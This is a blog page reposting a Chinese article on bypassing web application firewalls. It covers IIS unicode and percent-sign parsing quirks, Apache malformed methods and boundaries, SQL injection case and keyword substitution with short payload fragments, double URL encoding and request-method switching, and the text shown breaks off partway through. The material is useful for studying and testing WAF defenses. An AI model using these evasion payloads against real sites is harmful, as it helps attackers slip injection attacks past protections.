<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="干货|WAF绕过思路整理 乌雲安全  乌雲安全  微信号 hackctf 功能介绍乌雲安全，致力于红队攻防实战、内网渗透、代码审计、社工、安卓逆向、CTF比赛技巧、安全运维等技术干货分享，并预警最新漏洞，定期分享常用渗透工具、教程等资源。  __ 收录于话题 #waf绕过 6个 内容纲要  WAF绕过思路整理  方法论  WAF本体  分类  机制     Bypass  逻辑bypass  性能">
<meta property="og:type" content="article">
<meta property="og:title" content="WAF绕过">
<meta property="og:url" content="https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/index.html">
<meta property="og:site_name" content="w3q14">
<meta property="og:description" content="干货|WAF绕过思路整理 乌雲安全  乌雲安全  微信号 hackctf 功能介绍乌雲安全，致力于红队攻防实战、内网渗透、代码审计、社工、安卓逆向、CTF比赛技巧、安全运维等技术干货分享，并预警最新漏洞，定期分享常用渗透工具、教程等资源。  __ 收录于话题 #waf绕过 6个 内容纲要  WAF绕过思路整理  方法论  WAF本体  分类  机制     Bypass  逻辑bypass  性能">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://w3nq14.github.io/">
<meta property="og:image" content="https://w3nq14.github.io/WAF%E7%BB%95%E8%BF%87.assets/20210818120710.png">
<meta property="og:image" content="https://w3nq14.github.io/WAF%E7%BB%95%E8%BF%87.assets/20210818120739.png">
<meta property="og:image" content="https://w3nq14.github.io/WAF%E7%BB%95%E8%BF%87.assets/20210818120742.png">
<meta property="og:image" content="https://w3nq14.github.io/WAF%E7%BB%95%E8%BF%87.assets/20210818120744.png">
<meta property="og:image" content="https://w3nq14.github.io/WAF%E7%BB%95%E8%BF%87.assets/20210818120747.png">
<meta property="og:image" content="https://res.wx.qq.com/mmbizwap/zh_CN/htmledition./WAF%E7%BB%95%E8%BF%87.assets/pic/appmsg/pic_like_comment55871f.png">
<meta property="og:image" content="https://w3nq14.github.io/">
<meta property="article:published_time" content="2026-03-27T03:39:00.000Z">
<meta property="article:modified_time" content="2026-03-27T11:44:22.527Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://w3nq14.github.io/">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>WAF绕过</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 8.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/WHOAMI-xiaoyu">Projects</a></li><!--
     --><!--
       --><li><a href="/links/">Links</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2026/03/27/CTF/CtfShow-Misc/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2026/03/27/CTF/Nullcon%20Goa%20HackIM%202026%20CTF/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&text=WAF绕过"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&is_video=false&description=WAF绕过"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=WAF绕过&body=Check out this article: https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&title=WAF绕过"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&name=WAF绕过&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://w3nq14.github.io/2026/03/27/WAF%E7%BB%95%E8%BF%87/WAF%E7%BB%95%E8%BF%87/&t=WAF绕过"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B9%B2%E8%B4%A7-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%E6%95%B4%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">干货|WAF绕过思路整理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E8%AE%BA"><span class="toc-number">2.</span> <span class="toc-text">方法论</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WAF%E6%9C%AC%E4%BD%93"><span class="toc-number">3.</span> <span class="toc-text">WAF本体</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E7%B1%BB"><span class="toc-number">3.1.</span> <span class="toc-text">分类</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%BA%E5%88%B6"><span class="toc-number">3.2.</span> <span class="toc-text">机制</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass"><span class="toc-number">4.</span> <span class="toc-text">Bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-Server%E5%B1%82-bypass"><span class="toc-number">4.1.</span> <span class="toc-text">Web Server层 bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#IIS"><span class="toc-number">4.1.1.</span> <span class="toc-text">IIS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Apache"><span class="toc-number">4.1.2.</span> <span class="toc-text">Apache</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E5%B1%82bypass"><span class="toc-number">4.2.</span> <span class="toc-text">Web应用程序层bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Encoder"><span class="toc-number">4.2.1.</span> <span class="toc-text">Encoder</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8C%E9%87%8DURL%E7%BC%96%E7%A0%81"><span class="toc-number">4.2.2.</span> <span class="toc-text">双重URL编码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%AF%B7%E6%B1%82%E8%8E%B7%E5%8F%96%E6%96%B9%E5%BC%8F"><span class="toc-number">4.2.3.</span> <span class="toc-text">请求获取方式</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%98%E6%8D%A2%E8%AF%B7%E6%B1%82%E6%96%B9%E5%BC%8F"><span class="toc-number">4.2.3.1.</span> <span class="toc-text">变换请求方式</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%95%B8%E5%BD%A2%E8%AF%B7%E6%B1%82%E6%96%B9%E5%BC%8F"><span class="toc-number">4.2.3.2.</span> <span class="toc-text">畸形请求方式</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#HPP%E6%96%B9%E5%BC%8F"><span class="toc-number">4.2.3.3.</span> <span class="toc-text">HPP方式</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E5%B1%82bypass"><span class="toc-number">4.3.</span> <span class="toc-text">数据库层bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E7%89%B9%E6%80%A7"><span class="toc-number">4.3.1.</span> <span class="toc-text">数据库特性</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">5.</span> <span class="toc-text"></span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#mysql"><span class="toc-number">5.1.</span> <span class="toc-text">mysql</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E7%9A%84%E4%BD%8D%E7%BD%AE"><span class="toc-number">5.1.1.</span> <span class="toc-text">常见过滤的位置</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E7%9A%84%E5%87%BD%E6%95%B0-%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">5.1.2.</span> <span class="toc-text">常见过滤的函数&amp;关键字</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#mysqlTricks"><span class="toc-number">5.1.3.</span> <span class="toc-text">mysqlTricks</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Sqlserver"><span class="toc-number">5.2.</span> <span class="toc-text">Sqlserver</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E4%BD%8D%E7%BD%AE"><span class="toc-number">5.2.1.</span> <span class="toc-text">常见过滤位置</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E5%87%BD%E6%95%B0-%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">5.2.2.</span> <span class="toc-text">常见过滤函数&amp;关键字</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#SQLServerTricks"><span class="toc-number">5.2.3.</span> <span class="toc-text">SQLServerTricks</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WAF%E5%B1%82bypass"><span class="toc-number">5.3.</span> <span class="toc-text">WAF层bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%BB%E8%BE%91bypass"><span class="toc-number">5.3.1.</span> <span class="toc-text">逻辑bypass</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%A7%E8%83%BDbypass"><span class="toc-number">5.3.2.</span> <span class="toc-text">性能bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%80%A7%E8%83%BD%E6%A3%80%E6%B5%8Bbypass"><span class="toc-number">5.3.2.1.</span> <span class="toc-text">性能检测bypass</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%80%A7%E8%83%BD%E8%B4%9F%E8%BD%BDbypass"><span class="toc-number">5.3.2.2.</span> <span class="toc-text">性能负载bypass</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#fuzz-bypass"><span class="toc-number">5.3.3.</span> <span class="toc-text">fuzz bypass</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%99%BD%E5%90%8D%E5%8D%95Bypass"><span class="toc-number">5.3.4.</span> <span class="toc-text">白名单Bypass</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%8A%E4%BC%A0Bypass"><span class="toc-number">5.4.</span> <span class="toc-text">上传Bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#WAF%E6%A3%80%E6%9F%A5%E4%BD%8D%E7%BD%AE"><span class="toc-number">5.4.1.</span> <span class="toc-text">WAF检查位置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%B9%E5%99%A8%E7%89%B9%E6%80%A7"><span class="toc-number">5.4.2.</span> <span class="toc-text">容器特性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E7%89%B9%E6%80%A7"><span class="toc-number">5.4.3.</span> <span class="toc-text">系统特性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WAF%E7%BC%BA%E9%99%B7"><span class="toc-number">5.4.4.</span> <span class="toc-text">WAF缺陷</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87trick"><span class="toc-number">5.4.5.</span> <span class="toc-text">一些上传绕过trick</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E6%83%85%E5%86%B5bypass"><span class="toc-number">5.5.</span> <span class="toc-text">其他情况bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-%E8%8F%9C%E5%88%80%E8%BF%9E%E6%8E%A5%E6%8B%A6%E6%88%AA"><span class="toc-number">5.5.1.</span> <span class="toc-text">Bypass 菜刀连接拦截</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#webshell-%E5%85%8D%E6%9D%80"><span class="toc-number">5.5.2.</span> <span class="toc-text">webshell 免杀</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-%E7%A6%81%E6%AD%A2%E6%89%A7%EF%A8%88%E7%A8%8B%E5%BA%8F"><span class="toc-number">5.5.3.</span> <span class="toc-text">Bypass 禁止执行程序</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass-CDN%E6%9F%A5%E6%89%BE%E5%8E%9FIP"><span class="toc-number">5.5.4.</span> <span class="toc-text">Bypass CDN查找原IP</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">5.6.</span> <span class="toc-text">参考</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%91%E9%80%81%E5%88%B0%E7%9C%8B%E4%B8%80%E7%9C%8B"><span class="toc-number">5.6.1.</span> <span class="toc-text">发送到看一看</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        WAF绕过
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">John Doe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-03-27T03:39:00.000Z" class="dt-published" itemprop="datePublished">2026-03-27</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="干货-WAF绕过思路整理"><a href="#干货-WAF绕过思路整理" class="headerlink" title="干货|WAF绕过思路整理"></a>干货|WAF绕过思路整理</h2><p><a href="javascript:void(0);"> 乌雲安全 </a></p>
<p><strong>乌雲安全</strong> <img src="/"></p>
<p>微信号 hackctf</p>
<p>功能介绍<br>乌雲安全，致力于红队攻防实战、内网渗透、代码审计、社工、安卓逆向、CTF比赛技巧、安全运维等技术干货分享，并预警最新漏洞，定期分享常用渗透工具、教程等资源。</p>
<hr>
<p>__</p>
<p>收录于话题</p>
<p>#waf绕过</p>
<p>6个</p>
<p><strong>内容纲要</strong></p>
<ol>
<li><p>WAF绕过思路整理</p>
</li>
<li><p>方法论</p>
</li>
<li><p>WAF本体</p>
<ol>
<li><p>分类</p>
<ol start="2">
<li>机制</li>
</ol>
</li>
</ol>
</li>
<li><p>Bypass</p>
<ol>
<li><p>逻辑bypass</p>
<ol start="2">
<li><p>性能bypass</p>
<ol start="3">
<li><p>fuzz bypass</p>
<ol start="4">
<li><p>白名单Bypass</p>
<ol start="5">
<li><p>性能检测bypass</p>
<ol start="6">
<li><p>性能负载bypass</p>
<ol start="7">
<li><p>数据库特性</p>
<ol start="8">
<li><p>mysql</p>
<ol start="9">
<li><p>Sqlserver</p>
<ol start="10">
<li><p>常见过滤的位置</p>
<ol start="11">
<li><p>常见过滤的函数&amp;关键字</p>
</li>
<li><p>mysqlTricks</p>
</li>
<li><p>常见过滤位置</p>
</li>
<li><p>常见过滤函数&amp;关键字</p>
</li>
<li><p>SQLServerTricks</p>
</li>
<li><p>Encoder</p>
</li>
<li><p>双重URL编码</p>
</li>
<li><p>请求获取方式</p>
</li>
<li><p>变换请求方式</p>
</li>
<li><p>畸形请求方式</p>
</li>
<li><p>HPP方式</p>
</li>
<li><p>IIS</p>
</li>
<li><p>Apache</p>
</li>
<li><p>Web Server层 bypass</p>
</li>
<li><p>Web应用程序层bypass</p>
</li>
<li><p>数据库层bypass</p>
</li>
<li><p>WAF层bypass</p>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
<li><p>上传Bypass</p>
<ol>
<li><p>WAF检查位置</p>
<ol start="2">
<li><p>容器特性</p>
<ol start="3">
<li><p>系统特性</p>
<ol start="4">
<li><p>WAF缺陷</p>
<ol start="5">
<li>一些上传绕过trick</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
<li><p>其他情况bypass</p>
<ol>
<li><p>Bypass 菜刀连接拦截</p>
<ol start="2">
<li><p>webshell 免杀</p>
<ol start="3">
<li><p>Bypass 禁止执行程序</p>
<ol start="4">
<li>Bypass CDN查找原IP</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</li>
<li><p>参考</p>
<ol>
<li>Related articles</li>
</ol>
</li>
</ol>
<h2 id="方法论"><a href="#方法论" class="headerlink" title="方法论"></a>方法论</h2><p> <strong>BYPASS<br>WAF实际上是去寻找位于WAF设备之后处理应用层数据包的硬件&#x2F;软件的特性。利用特性构造WAF不能命中，但是在应用程序能够执行成功的载荷，绕过防护。</strong><br>那些特性就像是一个个特定的场景一样，一些是已经被研究人员发现的，一些是还没被发现，等待被研究人员发现的。当我们的程序满足了这一个个的场景，倘若WAF没有考虑到这些场景，我们就可以利用这些特性bypass掉WAF了。<br>例如我们现在需要bypass一个云WAF&#x2F;IPS&#x2F;硬件WAF，此处我们可以利用的点就是：</p>
<blockquote>
<p>1.Web服务器层bypass<br>2.Web应用程序层bypass<br>3.数据库层 bypass<br>4.WAF层bypass</p>
</blockquote>
<h2 id="WAF本体"><a href="#WAF本体" class="headerlink" title="WAF本体"></a>WAF本体</h2><p>Web Application Firewall</p>
<h3 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h3><p>1.云WAF</p>
<p>在配置云WAF时（通常是CDN包含的WAF），DNS需要解析到CDN的ip上去，在请求uri时，数据包就会先经过云WAF进行检测，如果通过再将数据包流给主机。</p>
<p>2.主机防护软件</p>
<p>在主机上预先安装了这种防护软件，可用于扫描和保护主机（废话），和监听web端口的流量是否有恶意的，所以这种从功能上讲较为全面。这里再插一嘴，mod_security、ngx-<br>lua-WAF这类开源WAF虽然看起来不错，但是有个弱点就是升级的成本会高一些。</p>
<p>3.硬件ips&#x2F;ids防护、硬件WAF</p>
<p>使用专门硬件防护设备的方式，当向主机请求时，会先将流量经过此设备进行流量清洗和拦截，如果通过再将数据包流给主机。</p>
<p>4.软WAF</p>
<p>软件WAF则是安装在需要防护的服务器上，实现方式通常是WAF监听端口或以Web容器扩展方式进行请求检测和阻断。</p>
<h3 id="机制"><a href="#机制" class="headerlink" title="机制"></a>机制</h3><p><img src="/./WAF%E7%BB%95%E8%BF%87.assets/20210818120710.png"></p>
<p>假设客户端访问url：<a target="_blank" rel="noopener" href="http://www.miku.com/1.php?id=1%E2%80%99and%E2%80%991%E2%80%99=%E2%80%991%EF%BC%8C%E8%AF%A5%E8%AF%B7%E6%B1%82%E8%AF%B7%E6%B1%82%E7%9A%84%E6%95%B0%E6%8D%AE%E6%98%AF%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%ADid%E4%B8%BA1%E7%9A%84%E8%AE%B0%E5%BD%95%E3%80%82">http://www.miku.com/1.php?id=1’and’1’=’1，该请求请求的数据是服务器上数据库中id为1的记录。</a><br>假设这台服务器使用了相关云WAF。</p>
<p>1）一个完整的过程，首先会请求DNS，由于配置云WAF的时候，会修改DNS的解析。我们发送DNS请求之后，域名会被解析到云WAF的ip上去。DNS解析完成之后，获取到域名信息，然后进入下一个步骤。</p>
<p>2）HTTP协议是应用层协议，且是tcp协议，因此会首先去做TCP的三次握手，此处不去抠三次握手的细节，假设三次握手建立完毕。</p>
<p>3）发送HTTP请求过去，请求会依次经过云WAF，硬件IPS&#x2F;IDS设备，硬件WAF设备，服务器，web服务器，主机防护软件&#x2F;软WAF，WEB程序，数据库。云WAF，硬件IPS&#x2F;IDS，硬件WAF均有自己处理数据的方式。</p>
<p>在获取HTTP数据之前会做TCP重组，重组主要目的是针对互联网数据包在网络上传输的时候会出现乱序的情况，数据包被重组之后就会做协议解析，取出相关的值。如http_method&#x3D;GET,http_payload&#x3D;xxx等等。这些值就对应了IPS规则中相关规则的值。从而来判断规则匹配与不匹配。</p>
<h2 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h2><h3 id="Web-Server层-bypass"><a href="#Web-Server层-bypass" class="headerlink" title="Web Server层 bypass"></a>Web Server层 bypass</h3><h4 id="IIS"><a href="#IIS" class="headerlink" title="IIS"></a>IIS</h4><p>运行在IIS上的程序一般为asp,aspx的。在IIS上我们可以利用的特性：</p>
<p> <strong>1.%特性</strong></p>
<p>在asp+iis的环境中存在一个特性，就是特殊符号%，在该环境下当们我输入s%elect的时候，在WAF层可能解析出来的结果就是s%elect，但是在iis+asp的环境的时候，解析出来的结果为select。</p>
<p> <strong>2.%u特性</strong></p>
<p>Iis服务器支持对于unicode的解析，例如我们对于select中的字符进行unicode编码，可以得到如下的<code>s%u006c%u0006ect</code>，这种字符在IIS接收到之后会被转换为select，但是对于WAF层，可能接收到的内容还是<code>s%u006c%u0006ect</code>，这样就会形成bypass的可能。</p>
<p> <strong>3.另类%u特性（ASP+IIS）</strong></p>
<p>该漏洞主要利用的是unicode在iis解析之后会被转换成multibyte，但是转换的过程中可能出现：多个widechar会有可能转换为同一个字符。打个比方就是譬如select中的e对应的unicode为%u0065，但是%u00f0同样会被转换成为e。<code>s%u0065lect-&gt;select s%u00f0lect-&gt;select</code></p>
<p>4.其他trick<br>Unicode<br>畸形Unicode<br>ADS流<br>N种HTTP畸形正文<br>解析特性<br>截断特性<br>HPP<br>畸形Boundary<br>GET&#x2F;POST分不清<br>畸形字符代替正常字符</p>
<h4 id="Apache"><a href="#Apache" class="headerlink" title="Apache"></a>Apache</h4><p>1.畸形method</p>
<p>某些apache版本在做GET请求的时候，无论method为何值均会取出GET的内容，如请求为的method为DOTA2，依然返回了aid为2的结果。</p>
<p>2.php+apache畸形的boundary</p>
<p>php在解析multipart data的时候有自己的特性，对于boundary的识别，只取了逗号前面的内容，例如我们设置的boundary为—-<br>aaaa,123456，php解析的时候只识别了—-<br>aaaa,后面的内容均没有识别。然而其他的如WAF在做解析的时候，有可能获取的是整个字符串，此时可能就会出现BYPASS。</p>
<p>3.解析特性</p>
<p>4.HPP</p>
<h3 id="Web应用程序层bypass"><a href="#Web应用程序层bypass" class="headerlink" title="Web应用程序层bypass"></a>Web应用程序层bypass</h3><p> <strong>1、大小写&#x2F;关键字替换</strong></p>
<p>这是最简单的绕过技术，用来绕过只针对特定关键字，大小写不敏感。</p>
<p>​<br>    id&#x3D;1 UnIoN&#x2F;**&#x2F;SeLeCT 1,user()</p>
<p>将关键字进行等价替换：</p>
<p>​<br>    Hex() bin() 等价于ascii()<br>    Sleep() 等价于 benchmark()<br>    Mid()substring() 等价于 substr()<br>    @@user 等价于 User()<br>    @@Version 等价于 version()</p>
<h4 id="Encoder"><a href="#Encoder" class="headerlink" title="Encoder"></a>Encoder</h4><p>Json<br>Unicode<br>base64<br>urlencode<br>html<br>Serialize</p>
<h4 id="双重URL编码"><a href="#双重URL编码" class="headerlink" title="双重URL编码"></a>双重URL编码</h4><p>双重url编码，即对于浏览器发送的数据进行了两次urlencode操作，如s做一次url编码是%73,再进行一次编码是%25%37%33。一般情况下数据经过WAF设备的时候只会做一次url解码，这样解码之后的数据一般不会匹配到规则，达到了bypass的效果。<br>个人理解双重url编码，要求数据在最后被程序执行之前，进行了两次url解码，如果只进行了一次解码，这样在最后的结果也是不会被正确执行的。</p>
<h4 id="请求获取方式"><a href="#请求获取方式" class="headerlink" title="请求获取方式"></a>请求获取方式</h4><h5 id="变换请求方式"><a href="#变换请求方式" class="headerlink" title="变换请求方式"></a>变换请求方式</h5><p>1）GET,POST,COOKIE<br>在web环境下有时候会出现统一参数获取的情况，主要目的就是对于获取的参数进行统一过滤。例如我获取的参数t&#x3D;select 1 from 2<br>这个参数可以从get参数中获取，可以从post参数获取，也可以从cookie参数中获取。</p>
<p>2）urlencode和form-data</p>
<p>POST在提交数据的时候有两种方式，第一种方式是使用urlencode的方式提交，第二种方式是使用form-<br>data的方式提交。当我们在测试站点的时候，如果发现POST提交的数据被过滤掉了，此时可以考虑使用form-data的方式去提交。</p>
<h5 id="畸形请求方式"><a href="#畸形请求方式" class="headerlink" title="畸形请求方式"></a>畸形请求方式</h5><p>1）asp&#x2F;asp.net request解析</p>
<p>在asp和asp.net中使用参数获取用户的提交的参数一般使用request包，譬如使用request[‘’]来获取的时候可能就会出现问题。</p>
<p>当使用request[‘’]的形式获取包的时候，会出现GET，POST分不清的情况，譬如可以构造一个请求包，METHOD为GET，但是包中还带有POST的内容和POST的content-<br>type。</p>
